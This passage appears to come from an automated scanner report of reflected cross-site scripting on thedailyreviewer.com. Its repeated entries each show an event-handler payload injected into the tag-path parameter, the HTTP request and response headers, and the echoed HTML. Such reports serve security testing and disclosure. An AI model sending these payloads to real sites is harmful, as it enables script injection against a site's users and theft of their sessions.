<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with c5310f<img src=a onerror=alert(1)>dee4f1b5745</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 56a98<img%20src%3da%20onerror%3dalert(1)>b0e028b2992 was submitted in the REST URL parameter 3. This input was echoed as 56a98<img src=a onerror=alert(1)>b0e028b2992 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/d56a98<img%20src%3da%20onerror%3dalert(1)>b0e028b2992 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:30:58 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=1a962f7c9b1fb720018ec62c98515b3e; expires=Wed, 12-Dec-2035 00:30:58 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with d56a98<img src=a onerror=alert(1)>b0e028b2992</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3161a<img%20src%3da%20onerror%3dalert(1)>e459197fbe8 was submitted in the REST URL parameter 3. This input was echoed as 3161a<img src=a onerror=alert(1)>e459197fbe8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/e3161a<img%20src%3da%20onerror%3dalert(1)>e459197fbe8 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:30:55 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=f4ef5c4848cc29926212c37c3fdc2115; expires=Wed, 12-Dec-2035 00:30:56 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with e3161a<img src=a onerror=alert(1)>e459197fbe8</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 70715<img%20src%3da%20onerror%3dalert(1)>009885355d4 was submitted in the REST URL parameter 3. This input was echoed as 70715<img src=a onerror=alert(1)>009885355d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/f70715<img%20src%3da%20onerror%3dalert(1)>009885355d4 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:00 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=135035616262fb54bdeda89b7831ecba; expires=Wed, 12-Dec-2035 00:31:00 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with f70715<img src=a onerror=alert(1)>009885355d4</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9c109<img%20src%3da%20onerror%3dalert(1)>704c2e449f2 was submitted in the REST URL parameter 3. This input was echoed as 9c109<img src=a onerror=alert(1)>704c2e449f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/g9c109<img%20src%3da%20onerror%3dalert(1)>704c2e449f2 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:30:56 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=cf4ebbb2602638764445ded319810ca5; expires=Wed, 12-Dec-2035 00:30:56 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with g9c109<img src=a onerror=alert(1)>704c2e449f2</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 230bb<img%20src%3da%20onerror%3dalert(1)>e08fcc684b6 was submitted in the REST URL parameter 3. This input was echoed as 230bb<img src=a onerror=alert(1)>e08fcc684b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/h230bb<img%20src%3da%20onerror%3dalert(1)>e08fcc684b6 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:30:48 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=5c51009db4001393b5f636eb3287d208; expires=Wed, 12-Dec-2035 00:30:49 GMT; path=/ Content-Length: 11731 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with h230bb<img src=a onerror=alert(1)>e08fcc684b6</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 46922<img%20src%3da%20onerror%3dalert(1)>083575eb85a was submitted in the REST URL parameter 3. This input was echoed as 46922<img src=a onerror=alert(1)>083575eb85a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/i46922<img%20src%3da%20onerror%3dalert(1)>083575eb85a HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:30:58 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=58a3c1cee207541224ac9aa453461772; expires=Wed, 12-Dec-2035 00:30:58 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with i46922<img src=a onerror=alert(1)>083575eb85a</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e2a41<img%20src%3da%20onerror%3dalert(1)>995f2589ceb was submitted in the REST URL parameter 3. This input was echoed as e2a41<img src=a onerror=alert(1)>995f2589ceb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/je2a41<img%20src%3da%20onerror%3dalert(1)>995f2589ceb HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:02 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=4eea54fd0843137f02a9e881663c26dc; expires=Wed, 12-Dec-2035 00:31:03 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with je2a41<img src=a onerror=alert(1)>995f2589ceb</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a0dd8<img%20src%3da%20onerror%3dalert(1)>826824ff5c2 was submitted in the REST URL parameter 3. This input was echoed as a0dd8<img src=a onerror=alert(1)>826824ff5c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/ka0dd8<img%20src%3da%20onerror%3dalert(1)>826824ff5c2 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:30:59 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=c6bdb685d61149fbbbac72e754d3efc1; expires=Wed, 12-Dec-2035 00:30:59 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with ka0dd8<img src=a onerror=alert(1)>826824ff5c2</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eaab7<img%20src%3da%20onerror%3dalert(1)>a7e88099fd was submitted in the REST URL parameter 3. This input was echoed as eaab7<img src=a onerror=alert(1)>a7e88099fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/leaab7<img%20src%3da%20onerror%3dalert(1)>a7e88099fd HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:30:57 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=5397a6a0cb92740d8cd5928a13bb24ce; expires=Wed, 12-Dec-2035 00:30:57 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11730
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with leaab7<img src=a onerror=alert(1)>a7e88099fd</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52cd3<img%20src%3da%20onerror%3dalert(1)>bc6908de3fc was submitted in the REST URL parameter 3. This input was echoed as 52cd3<img src=a onerror=alert(1)>bc6908de3fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/m52cd3<img%20src%3da%20onerror%3dalert(1)>bc6908de3fc HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:01 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=9eee750156853aa32976fec310581dd3; expires=Wed, 12-Dec-2035 00:31:01 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with m52cd3<img src=a onerror=alert(1)>bc6908de3fc</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e52e2<img%20src%3da%20onerror%3dalert(1)>b3fb6863bfa was submitted in the REST URL parameter 3. This input was echoed as e52e2<img src=a onerror=alert(1)>b3fb6863bfa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/ne52e2<img%20src%3da%20onerror%3dalert(1)>b3fb6863bfa HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:04 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=45673970d26c4c1dac58d58ca654089a; expires=Wed, 12-Dec-2035 00:31:04 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with ne52e2<img src=a onerror=alert(1)>b3fb6863bfa</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cd35c<img%20src%3da%20onerror%3dalert(1)>9e57969e7b4 was submitted in the REST URL parameter 3. This input was echoed as cd35c<img src=a onerror=alert(1)>9e57969e7b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/ocd35c<img%20src%3da%20onerror%3dalert(1)>9e57969e7b4 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:01 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=5e8ba0033ae25ed0f178dfb1d73e62d1; expires=Wed, 12-Dec-2035 00:31:01 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with ocd35c<img src=a onerror=alert(1)>9e57969e7b4</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fad4c<img%20src%3da%20onerror%3dalert(1)>f120133018d was submitted in the REST URL parameter 3. This input was echoed as fad4c<img src=a onerror=alert(1)>f120133018d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/pfad4c<img%20src%3da%20onerror%3dalert(1)>f120133018d HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:13 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=0b2844cdf2e55243b710dc0cfe79b619; expires=Wed, 12-Dec-2035 00:31:13 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with pfad4c<img src=a onerror=alert(1)>f120133018d</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1c4e5<img%20src%3da%20onerror%3dalert(1)>9cfada59b25 was submitted in the REST URL parameter 3. This input was echoed as 1c4e5<img src=a onerror=alert(1)>9cfada59b25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/q1c4e5<img%20src%3da%20onerror%3dalert(1)>9cfada59b25 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:19 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=f5fe473daf349138794941518b0cf55f; expires=Wed, 12-Dec-2035 00:31:20 GMT; path=/ Content-Length: 11731 Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with q1c4e5<img src=a onerror=alert(1)>9cfada59b25</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dc1ab<img%20src%3da%20onerror%3dalert(1)>25b6d3502e7 was submitted in the REST URL parameter 3. This input was echoed as dc1ab<img src=a onerror=alert(1)>25b6d3502e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/rdc1ab<img%20src%3da%20onerror%3dalert(1)>25b6d3502e7 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:23 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=0741d30db1ebc6c155b940e19988971b; expires=Wed, 12-Dec-2035 00:31:24 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with rdc1ab<img src=a onerror=alert(1)>25b6d3502e7</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eb187<img%20src%3da%20onerror%3dalert(1)>45622596c44 was submitted in the REST URL parameter 3. This input was echoed as eb187<img src=a onerror=alert(1)>45622596c44 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/seb187<img%20src%3da%20onerror%3dalert(1)>45622596c44 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:33 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=c3a8dc6214f3d4e004eb7702bffb17fe; expires=Wed, 12-Dec-2035 00:31:33 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with seb187<img src=a onerror=alert(1)>45622596c44</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a1f3a<img%20src%3da%20onerror%3dalert(1)>63a21b10329 was submitted in the REST URL parameter 3. This input was echoed as a1f3a<img src=a onerror=alert(1)>63a21b10329 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/ta1f3a<img%20src%3da%20onerror%3dalert(1)>63a21b10329 HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:38 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=85c4d009a01091a415fc00d558fdd2a5; expires=Wed, 12-Dec-2035 00:31:38 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 11731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 style="text-transform:capitalize">Tags Starting with ta1f3a<img src=a onerror=alert(1)>63a21b10329</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b1fbb<img%20src%3da%20onerror%3dalert(1)>cffacca60fa was submitted in the REST URL parameter 3. This input was echoed as b1fbb<img src=a onerror=alert(1)>cffacca60fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tags/alphabetical/ub1fbb<img%20src%3da%20onerror%3dalert(1)>cffacca60fa HTTP/1.1 Host: thedailyreviewer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 11 Dec 2010 18:31:51 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5 X-Powered-By: PHP/5.2.9 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: CAKEPHP=094e378e337ce3c550204bd6fe5392b9; expires=Wed, 12-Dec-2035 00:31:51 GMT; path=/ Content-Length: 11731 Connection: close Content-Type: text/html
